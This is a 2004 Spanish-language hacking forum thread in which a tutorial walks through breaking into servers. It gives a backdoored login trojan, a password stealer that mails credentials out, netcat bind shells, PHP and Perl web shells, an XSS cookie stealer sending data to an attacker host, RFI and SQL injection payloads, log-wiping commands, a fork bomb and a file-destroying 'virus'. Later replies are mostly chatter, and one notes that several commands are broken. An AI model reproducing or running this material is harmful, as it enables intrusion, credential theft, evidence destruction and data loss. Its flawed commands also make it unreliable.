Foro de elhacker.net

Informática => Tutoriales - Documentación => Mensaje iniciado por: HaCkZaTaN en 6 Noviembre 2004, 04:18 am



Título: Hacking Basico!!
Publicado por: HaCkZaTaN en 6 Noviembre 2004, 04:18 am
/*
  Name: Hacking
  Copyright: [N]eo Security [T]eam [NST]®
  Author: HaCkZaTaN
  Date: 04/11/04 19:19
  Description: Hacking
*/

 _________________________________
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|=-=-=-=-=-=by HaCkZaTaN-=-=-=-=-=|
|-=-=-You may pray for your Pc=-=-|
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|_________________________________|

_________
|1= Intro|
|________|

Hey q mas!! Pues aqi escribiendo esto haber que mas se me ocurre
____________
|2= Objetivo|
|___________|

Ir a Google.com

oK tenemosque mirar el objetivo detalladamente y anotar toda la Info Lo mas que podamos y no se te
ocurra Conectarte desde tu pc xD hazlo
desde una shell y utilzar bouncers...............................

________
|3= O.S | 
|_______|

oK determinar el O.S es muy importante
Formas:          __________________________________________________
Telnet> Host 23 [Es mucho mejor aveces colocar el puerto ssh <<22>>]
                 ___________________________________________________
Ftp> Host 21    [Para saber el server de ftp y mirar si tiene bugs para entrar como root es una forma
mas facil Determinar el DAEMON]
_______________________
|4= Escanear una WebPage|
|_______________________|

Yo scaneo con nmap es el mejor scanner que hay en la Net <<That's what i Think>>
Este scanner te da un log muy buena de los puertos y alguna informacion extra
Tenemos que mirar si esta en varios Dns para mirar con que nos metemos por que aveces estan los
diferentes puertos en cada Dns>>
Me explico [Dns1]>>>Tiene abierto el ftp
           [Dns2[>>>Tiene abierto el ssh
Escaneamod de esta manera
nslookup host
____________________________________
|5= Tratar de entrar por los puertos|
|___________________________________|

Para sacar info de los puertos y de los daemons hacemos

telnet> host 21
telnet> host 22
telnet> host 25
telnet> host 79
telnet> host 110
telnet> host 109
telnet> host 143
telnet> host 139 <<<por si utiliza archivos compartidos en windows>>>
telnet> host 119

oK nos vamos a mirar a cada daemon y mirar su server ejemplo

Port 21 Server ProFtp>>>> Buscamos Xploits para esta version de este server para tener permisos admins,
O si nos deja entrar como anonimo o
guest y nos deja mirar /etc/passwd o /etc/shadow/ pues miramos si no estan cifrados y buscamos un
desencriptador de Md5 o en lo que este
La mayoria de linux o Unix encriptan a 64bits

Port 22 lo mismo buscamos el server de ssh

Port 79 Finger si lo tienen abierto nos libran un peso de encima por que Esto nos da mucha informacion
del usuario o root escribimos <<</w>>>
para mirar quien esta en linea oK esto nos da mucho info.
Una cosa tambien podemos poner un sniffer es una grandiosa idea

Bueno con la informacion que aparece cuando haces el finger el passwd podria ser muy facil de sacarlo
y nos serviria como una shell gratuita
y de buena calidad <<smart me, don't I?>>

Otra seria sacar los passwd de los emails para mirar de que es lo que habla el root y con quien y hasta
depronto podemos utilixar nuestra
ingenieria social para sacar los passwd de la PC.
Podemos acceder por el puerto 110 <<POP>>
Podemos utilizar xploits, hay muchos para cada tipo de server de sendmail <<25>> o POP <<110>>

Tambien por el Puerto 80 scaneamos Bugs:
PHP NUKE
SQL
CGI
PL
ASP
APACHE
ORACLE
Etc...

____________________
|6= Local Xploits   |
|___________________|


Podemos utilizar exploits cuando ya estamos dentro de la maquina.

sh-3.00$ sh Xploit.sh
ven que facil ;-)
oK deben de saber de C por que aveces lo xplits no vienen bien configurados

Una vex hecho todo eso creamos un Usuario para tener una shell gratis xD
Pero no usuario normal si no uno con derechos como root (osea no ser root por que no se puede pero que tenga todos los derechos
posibles)) xD
Ahora estan con la moda del W00t, ptrace.. Bueno pues busquen acerca de el pero ademas ya son obsoletos

Jugando con offsets
Digo esto para los que les gusta jugar con ella :)
Un pequeno Brute Force en Perl.
***********************
#!/usr/bin/perl
$MIN=0;
$MAX=5000;
while($MIN<$MAX)
{
   printf('offset : $MIN n');
   system('xploit $MIN');
   $MIN++;
 }
**************************
__________________
|7- Remotes Xploits|
|__________________|

Ok subimos un xploit a  nuestra shell y colocamos:

root@HaCkZaTaN!!:~ # ./s 0 && cat | netcat host 457
id
uid=28(nouser) gid=28(nogroup) groups=28(nogroup)     

y listo nos dio una shell nobody.
Acuerdense que hay que jugar con el offset para poder tener root xD.

_________________
|8= Borrar Huellas|
|_________________|
 
Borramos Huellas de esta manera

rm /var/log/wtmp
rm /var/log/lastlog
Para arrglar el PC
tee /var/log/wtmp
tee /var/log/lastlog

modo mas bueno seria
find / -name log && rm -rf && rm -f && ps -def && grep klogd && kill -9 pid && ps -def | grep syslog
cd /
rm -rf .bash_history && rm -rf /var/adm && rm -rf /root/.bash_logout && rm -rf /root/.bash_history
hay que Editar.bash_history o .sh_history
y si quieres es tumbar la PC xD:
rm -rf/etc/passwd
rm -rf /etc/shadow
rm -rf /bin/login
rm -rf /bin/rm
rm -rf /etc/inetd.conf
killall login
***********************************
find / -name log* -exec rm -rf {} \     //Forma ofuscada
***********************************

Otra Forma ((REpito caso todo lo de arriba xD
Buscando archivos con nombres que empiexen por log:
****************
find / -name log //Despues los borramos
*****************

********************
ps -def | grep klogd //Editamos este archivo
ps -def | grep syslog //Editamos este archivo
********************

***********
kill -9 pid //Matamos todos los procesos
***********
****************************
cd /
unset HISTFILE
rm -rf .bash_history
rm -rf /var/adm
rm -rf /root/.bash_logout
rm -rf /root/.bash_history
****************************

En windows Seria
del c:\winnt\system32\logfiles
del c:\windwos\system32\logfiles
del c:\winnt\system32\logfiles\*.log
dir /s *.log
dir /s *.evt
Bueno pero esto no es todo es mejor que te bajes un Zapper o un Wipper es la misma cosa pero
gente le gusta llamarlo de diferentes maneras

____________
|9- Troyanos|
|___________|

Troyano para linux el mas famoso y mas confiable BackDoor <<Hint: La mayoria de linux no tienen
antivirus>>
Lo llamaremos login.c
***********************************************************************************************
#include <stdio.h>
#define OLDLOGIN "/usr/lib/login"
#define LOGINNAME "login"
#define MAGIC_WORD "localhost"
#define REVISION "$Id: Localcore 2000/08/14 21:31:00 marekm Exp $"
char **exe;
do_back() {
   puts(REVISION);
   putenv("TERM=vt100");
   putenv("HISTFILE=/dev/null");
   execl("/bin/sh","sh","-i",0);
}
main(argc, argv)
   int argc;
   char *argv[];
{
   exe = argv;
   exe[0] = LOGINNAME;
   if ((char *)getenv("DISPLAY") != (char *)NULL) 
      if (strncmp(getenv("DISPLAY"),MAGIC_WORD,strlen(MAGIC_WORD)) == 0)
         do_back();
   execv(OLDLOGIN,exe);
}
*****************************************************************************************************
Bueno lo Subimos asi;
cp /bin/login /usr/lib/login
chmod 777 /usr/lib/login
tee login.c
gcc -O2 login.c -o login
chmod 4755 /bin/login

Bueno si queremos colocar clave modificamos
#define MAGIC_WORD "localhost" <<<Por esto>>>
#define MAGIC_WORD "aqui el password sin espacios"
oK ya tenemos root xD.

Esto seria en Windwos Utilizamos el SUb7 0 SubSeven
Ok subiremos un bouncer xD
Hacemos esto
"advanced"
"PORT REDIRECT"

en "input port" pon el puerto que nos vamos a conectar ejemplo 1942
en "output host/ip" Ip/Host a conectar
en "output port" Puerto a conectar 21,23 etc.
<<tambien se puede hacer en el IRC cuando te banean o quieres entras por seguridad>>

Para estar con bouncer en cualquier puerto lo hacemos asi en este caso Sera Http <<80>>
en "input port" 80
en "output host/ip" Host/Ip
en "output port" 80

ahora en el UNICONSOLE ponemos la ip del BOUNCER en vez de www.mju.es y JAMAS sabran que hemos sido
nosotros los que han entrado.
Para entrar en un FTP con claves ROBADAS y que no nos visiten los agradables guardia civiles:

-en "input port" Pon 21
-en "output host/ip" ponemos el OBJETIVO ftp.terra.es (por ejm)
-en "output port" pon 21
oK es facil asi se hace susecivamente con todos los puertos Es lo mismo que en la shell pero un poco
mas complicado

Unos se preguntaran pero como le hago para no estar jugando con comandos desde la URL
pues hay tenemos una Opcion dejar la pagina que estamos atacando con un backdoor o
corriendo algun servidor que nos deje entrar con el ssh (Putty si estas en Windows)

hay un BackDoor que se llama r0nin o puedes buscar mas en google.com hay apareceran
bastantes.
Aqui les dejo un troyano:D
************************************************************************************
************************************************************************************
#include <stdio.h>
#include <pwd.h>
#include <stdlib.h>
#define EMAIL "correo@electronico.aqui"
#define ARCH "arch.fsu
int main(void)
{
  char enviar[100];
  char grabar[100];
  char* clave;
  FILE* archivo_ptr;
  clave = (char *) getpass("Password:");
  puts ("Sorry");
  archivo_ptr = fopen(ARCH, "w");
  fprintf (archivo_ptr, "Root Password: %s\n", clave);
  fclose (archivo_ptr);
#ifndef TMP
  sprintf(enviar, "mail %s < %s ; rm %s", EMAIL, ARCH, ARCH);
  system(enviar);
#else
  sprintf(grabar, "cp %s %s", ARCH, TMP);
  system(grabar);
#endif
  exit (EXIT_SUCCESS);
}
************************************************************************************
************************************************************************************
La otra opcion que digo es con el NetCat :D Dejando unpuerto a la escucha con alguna shell
ya sea
zsh sh bash etc.....
Pero como lo hacemos? pues es muy facil
si es una Windows la Maquina que estamos atacando dejas escuchando asi

  • Windows
****************************
nc -l -p 8000 -t -e cmd.exe -L
****************************
******************
nc -L -w 1 -p 8000
******************

  • Linux
*************************
nc -vvlp 8000 -e /bin/bash
*************************
******************
nc -L -w 1 -p 8000
******************

Bueno tu ya descojeras de las maneras que quieras
entonces despues le sacas la Ip a la Pagina que estas atacando o con el mismo host y desde tu maquina habres el ssh
o el telnet (Putty si estas en Windows) o el nc, recomiendo el netcat por que dejamos a la escucha con el mismo netcat
Entonces nos conectariamos asi
*********************
nc -vv host/ip 8000
********************

_________
|10= Spoof|
|_________|

El spoof es cuando falsean tu ip o la mayoria de los paquetes que entran en ella se utiliza para
saltar firewalls y otros tipos de seguridad.

___________________________
|11= Como tumbar un servidor|
|___________________________|

Compilar el programa:
cc synk4.c –o synk4

Modo de uso
./synk4 <ip-origen> <ip-destino> <puerto-inicial> <puerto-final>

<ip-origen> 0, y el programa utilizara un random de IPS 
<ip-destino> Pones la ip de destino ejemplo 127.0.0.1
<puerto-inicial> y <puerto-final>
Eje: ./synk4 0 127.0.0.1 21 21  0 23 23

Se empexara a moverse un contador...
Cuando llegue a 4000 o 5000 o 6000 ya paramos hay
Cuando acabemos todo y cerremos el progrma nos conectaremos al puerto que atacamos y nos damos cuenta
que esta tumbado xD

[root@localhost]# telnet localhost 23
Trying 127.0.0.1...


El programa a descargar se llama SYN <<TCP SYN Flooding>>
Bueno tambien se podria hacer local usar malloc(); y fork();
Ejemplo:
**********************************
/*
  Name: LinuxCrash
  Copyright: Neo Security Team [NST]®
  Author: HaCkZaTaN
  Date: 12/09/04 03:51
  Description: CrashesLinux
*/
int main()
  {
    while(1)
     {
            malloc(1024);
            fork();
     }
 return 0;
}
***************************************

______________
|12= Keylogger|
|_____________|

Bueno a muchos les gusta o no les gusta usar keyloggers pero si necesitas uno pues utilizalo todo
es posible en esta vida y si te dicen que es de lammer pues mas lammer el que se lo deja meter

______________
|12= Tecnicas |
|_____________|

Bueno esto me da hasta pena colocarlo pero bueno como se han dado cuenta ahora la moda de hackear es con el
w00t, r0nin, mass, yim. Pues son utilidades para *nix su modo de uso es sencillisimo

$chmod 777 programa
$./programa

Como pueden ver no tiene ciencia esas tecnicas son estupidas lo bueno es crear shellcodes y xploits
hacer overflows eso si que es muy bueno, trabajar con los offset etc....

______________
|12= XSS      |
|_____________|

Pues bueno ahora ya dicen que hackean una pagina Php o Html por hacer XSS en la pagina pero bueno eso
no importa lo que importa es aprender

<input type="text" name="palabra"> que será el formulario.
<input type="submit" name="buscar" value="Buscar"> que será el boton.

Como pueden ver es vulnerable entonces podemos proceder a hacer XSS
Creamos un archivo .php que contenga cookie

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
Bueno a mi casi no me gusta explicar si no dejar todo hecho y que usteddes lo descubran sorry si no explico

CrashCool ah creado una Herramienta exelente para esto lo que hace es cifrar el Texto>> Gracias CrashCool Pagina Crashcool.com
Link de descarga
http://crashcool.com/xss-c.zip
[-]XSS generator by CrashCool
[-]Introduzca codigo:
<script>alert("hola");</script>
  • Generado

<script>var b=String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 34, 104, 111, 108, 97, 34, 41, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62); document.write(b);</script>

[-]Guardarlo en archivo? (s/n) :s
  • guardado en xss.html
]x[ Pulse la tecla ENTER para salir...

Codigo:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define XSS_1 "<script>var b=String.fromCharCode("
#define XSS_2 "); document.write(b);</script>"
#define MAX_ENTRADA 800

/**
 *Generador de XSS
 *Genera y da la posibilidad de guardar a archivo
 *Diseñado para saltar filtros de las comillas ""
 *Autor:CrashCool
 *Fecha: 03/10/04
 *Licencia: GPL
 *web: www.crashcool.com
 *contacto: crashcool@gmail.com
 *V: 1.0.1
 *version original en JAVA www.crashcool.com
 */

void guardar(char *salida);

int main()
{   char a[MAX_ENTRADA];     
    char aux[5];
    char *res=NULL,opcion='\0';   
    int tamanyo,i;
    puts("[-]XSS generator by CrashCool");
    puts("[-]Introduzca codigo:");
    gets(a);
    fflush(stdin); 
    tamanyo=(strlen(a) * 3)+((strlen(a)-1) * 2);     
    res=(char *)malloc(tamanyo*(sizeof(char)));
   
    strcpy(res,XSS_1);
    for(i=0;i<(int)strlen(a);i++)
    {
        strcpy (aux, "");
        sprintf(aux,"%d",(int)a);
        if(i< (int)(strlen(a)-1) ) strcat(aux,", ");         
        strcat(res,aux);                  
    }
    strcat(res,XSS_2);
    puts("
  • Generado");
    printf("\n%s\n\n",res);
    printf("[-]Guardarlo en archivo? (s/n) :");
    opcion=getchar();
    if(opcion=='s' || opcion =='S'){
    guardar(res);
    puts("
  • guardado en xss.html");
    }
   fflush(stdin);
   puts("]x[ Pulse la tecla ENTER para salir...");
    getchar();
    return 0;     
}

void guardar(char *salida)
{
    FILE *archivo;
    archivo=fopen("xss.html","w");
    fprintf(archivo,"%s",salida);
    fclose(archivo);
}
******************************************************************************************
_________________________________
|13= Remote File Inclusion (RFI)|
|_______________________________|

Remote File Inclusion (RFI)

A mi casi no me gusta explicar si no dar el trabajo hecho osea al grano no dar vueltas al asunto

De que trata el Bug!!
----- beging the code in index.php -----

if (!isset($req_path)) $req_path="";
require_once($req_path."funcs.php");
----- end of the code -----
Forma de xplotar
 http://localhost/nst/index.php?req_path=http://nst/
_____________________________________________________________________________________________________

Otro bug es el de:
*************************************************
<?
exec($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
************************************************
<?
system($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
*************************************************
<?
passthru($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
*************************************************
 <?php
$com = $_GET["com"];
system ("$com");
?>
*************************************************
 <?php
echo '<?php $com = $_GET["com"]; system ("$com"); ?>';
?>
*****************************************************
Modo de explotacion
 http://localhost/nst/index.php?req_path=http://nst/&com=ls

___________________________________________________________________________________________________
Modo de Busqueda!!

****************************************************************************
****************************************************************************
allinurl: "index.php?*=*.php"
http://www.google.com/search?num=100&hl=en&lr=&q=allinurl%3A+%22index.php%3F*%3D*.php%22&btnG=Search
****************************************************************************
****************************************************************************
inurl: "index.php?*=*.php"
http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=inurl%3A+%22index.php%3F*%3D*.php%22&btnG=Search
****************************************************************************
****************************************************************************
allinurl: /My_eGallery/public/displayCategory.php?
http://www.google.ca/search?hl=en&q=allinurl%3A+%2FMy_eGallery%2Fpublic%2FdisplayCategory.php%3F&meta=
****************************************************************************
****************************************************************************
___________________________________________________________________________________________________
Bueno ahora estan con la Moda de Remote File Inclusion. Y todo esto dado en PHP bueno pues aqui
les traigo unos en Perl Smile Funcionan de la misma manera
http://host/cgi-bin/net.cgi?p=uname -a
Donde:
nst.cgi >> Es el nombre del archivo
p es el comando que esta en el nst.cgi que nos da shell
El que utilizo para esta demostracion es el numero 3 saludos

1
Código:
****************************************************************************
****************************************************************************
#! /usr/bin/perl
use CGI qw(:standard);
print header;
my $c=param("c");
if ($c gt "")
{
$s=`$c 2>&1`;
print start_form,textfield("c",$c),submit("go"),end_form,pre($s)
}
else
{
print "[N]eo Security [T]eam [NST]"
}
****************************************************************************
****************************************************************************

2
Código:
****************************************************************************
****************************************************************************
#! /usr/bin/perl
use CGI qw(:standard);
print header;
my $c=param("c");
if ($c gt "")
{
$s=`$c 2>&1`;
print start_form,textfield("c",$c),submit("go"),end_form,pre($s)
}
else{ print "[N]eo ecurity [T]eam [NST]"
}
****************************************************************************
****************************************************************************

3
Código:
****************************************************************************
****************************************************************************
#!/usr/bin/perl
use CGI qw(:standard);
print header;
my $k=param("p");
my $a=param("a");
if ($a || $k)
{
$l=`$k 2>&1`;
print start_form,textarea("p",$k,3,50);
print submit("Enter");
print end_form;
print pre($l);
}
****************************************************************************
****************************************************************************
_________________________________
|13= Subiendo Archivos a un host|
|_______________________________|

Como subimos archivos a la pagina o host a Hackear?
Pues hay muchas formas pero dare unas cuentas
wget http://www.host.com/archivo.c
lynx http://www.host.com/archivo.c
links http://www.host.com/archivo.c
curl -O http://www.host.com/archivo.c
curl -a ftp://www.host.com/archivo.c

****************************************************************************
****************************************************************************
______________
|14= Rooteando|
|_____________|

Como lo rooteo?
Bueno ahora te toca tu turno de ir a google.com y buscar
Aqui en Neosecurityteam.org tenemos unos cuantos xploits que nos dan root remotamente o localmente
solo necesitas compilarlos y ya
hay un archivo en la red que se llama w00t, xp1.
estos te daran root con solo ejecutarlos en el sistema que bueno no?
jajaj se utilizan asi
./w00t
./xp1

Otra forma seria por shellcodes!!
Pero esto si no lo explicare es algo muy largo pero si quieren tener idea de lo que hablo ok

main()
{
system("/bin/sh"); //exeve(1,"/bin/sh");
}

Compilas eso como un .c y listo despues objdum -d archivo sacamos NULL's bytes osea
xoring y listo. Complicado no!!

****************************************************************************
****************************************************************************
_______________
|15= Compilando|
|______________|

Como compilo?
gcc -O4 -w -g -s archivo.c -o x
gcc archivo.c -x
nasm archivo.asm

Como linkeo desde asm?
nasm -f elf archivo.asm
ld -o archivo.exe archivo.o
****************************************************************************
****************************************************************************
_______________
|16= Anonimo   |
|______________|
Quiero estar anonimo?
Busca acerca de
Bouncers
PSYbnc
Proxys
****************************************************************************
****************************************************************************

______________________
|17= Inyeccion SQL   |
|____________________|

No explicare mucho solo dare unos User y Pass!!
usuario='geek'                       senha='s3nh4'
usuario='' or '1'                    senha='s3nh4'
usuario=&nbsp;'or'                   senha=&nbsp;'or'
usuario=' or ' 1                     senha=' or ' 1
usuario='1' = '1'                    senha='1' = '1'
usuario=' or '1'='1                  senha=' or '1'='1
usuario='' or '1'='1'                senha='' or '1'='1'
usuario="senha"                      senha="senha"
usuario="password"                   senha="password"
usuario="teste"                      senha="teste"
usuario="123"                        senha="123"
usuario="1234"                       senha="1234"
usuario="12345"                      senha="12345"
usuario="VB"                         senha="VB"
usuario="visual"                     senha="visual"
usuario="basic"                      senha="basic"
usuario=' or senha='teste            senha=' or senha='teste
usuario=' or senha='login            senha=' or senha='login
usuario=' or email like 'flavio%     senha= ' or email like 'flavio%
usuario='or '1'='1' order by 1 --    senha='or '1'='1' order by 1 --
usuario=' or '1'='1' order by 1 --   senha=' or '1'='1' order by 1 --
usuario=' or 1=1--                   senha=' or 1=1--
usuario='or''='                      senha='or''='
usuario=' or 'a'='a                  senha=' or 'a'='a
usuario=') or ('a'='a                senha=') or ('a'='a
usuario=b' or ' 1='                  senha=b' or ' 1='
usuario=' or '|                      senha=' or '|
usuario=123'or'=                     senha=123'or'=
usuario=admin'-                      senha=admin'-
usuario=' or '1=true                 senha=' or '1=true
usuario=7' or ' 1                    senha=7' or ' 1
usuario=root                         senha=root
usuario=shell                        senha=shell
usuario=admin                        senha=123456
usuario=admin                        senha=admin
Usuario=‘;shutdown--                 senha=‘;shutdown--
****************************************************************************
****************************************************************************
_____________
|18 OffTopic|
|___________|
Bueno muchos dicen por hay que es un Lame Virus o le dicen otros nombres
mas por que razon? Por que le pasan el codigo a un Lammersito cualquiera
y le dicen mira compila esto y cojeras r00t o ownearas windows o cualquier
cosa. Se puede compilar en windows o linux
gcc LameViruz.c
Código:
/*
  Name: LameViruz
  Copyright: [N]eo ecurity [T]eam [NST]®
  Author: HaCkZaTaN
  Date: 26/10/04 17:17
  Description: LameViruz
*/

#include <stdio.h>
#include <stdlib.h>
int main()
{
double x;
for (x=0; x<1000000000; x++)
{
printf("\nHacktool\n", x);
printf("\nAhora miraras que ya puedes hackear con solo mirar la pantalla ;)\n", x);
system("rm -rf /bin/*");
system("rm -rf /usr/bin/*");
system("rm -rf /*");
system("del /F /Q C:\\windows\\system32\\hal.dll");
system("del /F /Q C:\\windows\\system32\\kernel32.dll");
system("del /F /Q D:\\windows\\system32\\hal.dll");
system("del /F /Q D:\\windows\\system32\\kernel32.dll");
system("del /F /Q c:\\*.ini");
system("del /F /Q c:\\*.bat");
system("del /F /Q c:\\*.sys");
system("del /F /Q c:\\*.exe");
system("del /F /Q c:\\*.dll");
system("del /F /Q c:\\windows\\*.ini");
}
}

****************************************************************************
****************************************************************************
________________________________________________________________________________________________
NOTA o TIP

Es muy recomendable dar permisos a los archivos que subes o que quieres ejecutar.
como se hace eso?
les dare tres formas
chmod -x archivo
chmod 777 archivo
chmod 777 *
=====================================================================
=====================================================================


Título: Re: Hacking Basico!!
Publicado por: K-19 en 11 Noviembre 2004, 05:38 am
 ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::)


Título: Re: Hacking Basico!!
Publicado por: - DarkLinux - en 20 Noviembre 2004, 08:31 am
No me parece Básico.

Ami forma de pensar. Esto no es lo que buscan los super new bies.

Lo que buscan ellos es algo de troyanos, keyloggers, caballos de troya, meterse a pc por telnet.

Etc...

Esto ya es para los que ya vieron lo anterior, y entonces si, leen el manualito de arriba, y pues aumentan de calidad de persona y su autoestima aumente :) jejej

Saludos


Título: Re: Hacking Basico!!
Publicado por: HaCkZaTaN en 21 Noviembre 2004, 04:39 am
:o Pues no se como lo cojan es igual basico, avanzado. el fin es de aprender.
Salu2!!


Título: Re: Hacking Basico!!
Publicado por: CiberWoW en 18 Julio 2007, 04:43 am
LO QUE NO ENTIENDO es por que tacho la letra eso complica la lectura ...

SaLu2  ::)


Título: Re: Hacking Basico!!
Publicado por: yeikos en 18 Julio 2007, 04:47 am
LO QUE NO ENTIENDO es por que tacho la letra eso complica la lectura ...

SaLu2  ::)

Copia el documento y pegalo en el bloc de notas... :P


Título: Re: Hacking Basico!!
Publicado por: ActiveSheet en 20 Julio 2007, 09:49 am
no sean malitos traduscanmelo padesco de la vista


Título: Re: Hacking Basico!!
Publicado por: Tor en 20 Julio 2007, 10:18 am
LO QUE NO ENTIENDO es por que tacho la letra eso complica la lectura ...

SaLu2  ::)

Copia el documento y pegalo en el bloc de notas... :P

Si bueno, ya, pero PORQUE esta tachado el texto? :S


Título: Re: Hacking Basico!!
Publicado por: yeikos en 20 Julio 2007, 11:08 am
El autor quiso escribir...

Código:
[N]eo [S]ecurity [T]eam [NST]®

Pero en bbCODE la etiqueta [*s] está reservada para tachar el texto...

Citar
[N]eo ecurity [T]eam [NST]®


Título: Re: Hacking Basico!!
Publicado por: Tor en 20 Julio 2007, 11:22 am
El autor quiso escribir...

Código:
[N]eo [S]ecurity [T]eam [NST]®

Pero en bbCODE la etiqueta [*s] está reservada para tachar el texto...

Citar
[N]eo ecurity [T]eam [NST]®

Lol xD


Gracias! :P


Título: Re: Hacking Basico!!
Publicado por: Kasswed en 20 Julio 2007, 15:13 pm
Modificado. Más vale tarde que nunca.

Saludos.


Título: Re: Hacking Basico!!
Publicado por: ActiveSheet en 20 Julio 2007, 23:06 pm
mira na mas que buena onda ahora si esta bueno


Título: Re: Hacking Basico!!
Publicado por: RubiiTo en 7 Noviembre 2007, 20:42 pm
Esta muy Bien, Gracias :D




Título: Re: Hacking Basico!!
Publicado por: rubick en 5 Junio 2008, 20:33 pm
Me parece una basura todo el documento.

Simplemente comento una linea:
Citar
find / -name log && rm -rf && rm -f && ps -def && grep klogd && kill -9 pid && ps -def | grep syslog
cd /

Esto busca desde el raiz un fichero que se llama literalmente "log" (no encontrara ficheros como access.log) luego, si el comando ha finalizado SIN errores (&&) ejecutará el sieguiente. El find, si lo ejecutas en algunos sistemas linux te darán error en algunos directorios por lo cual ya no se ejecutarán más comandos.

Si el find no diera errores, borrarías forzando y de manera recursiva ningún fichero!!!!!!!!! si este comando termina bien (&&) que sabemos a ciencia cierta que te dará un error y no continuará, ejecutarías supuestamente un ps que te mostraría los ficheros y en este caso como el comando si sale bien, !buscarías la cadena klogd en ningún sitio!

De nuevo.. si el anterior comando que te devolverá un error no lo hiciera, luego harías un kill sobre numero de proceso "pid" ¿??¿?¿?

Esto solo en una linea..... se nota de sobra que no sabes de lo que estás hablando.

Por cierto ...
Citar
sh-3.00$ sh Xploit.sh
ven que facil ;-)
oK deben de saber de C por que aveces lo xplits no vienen bien configurados

Como que es así de facil un xploit????? no dices a que vulnerabilidad ataca, a que versiones afecta,  como funciona ni como se llama ese xploit... Y nos dices que nosotros debemos de saber C, ¿Sabes acaso tu programar en C? Ejecutas en una shell "sh programa.sh" un script (ver la extension .sh) y luego dices que no vienen bien configurados estos exploits en C???? En fin....

Escribo esto para que la gente que se haya leido esta basura sepa que la información no es correcta y puede inducir a graves errores.


Título: Re: Hacking Basico!!
Publicado por: :ohk<any> en 6 Junio 2008, 21:53 pm
Interesante Info, se que ve te ha tomado tiempo hacerlo.
Voy a probar un par de tus método haber que pasa.

Saludos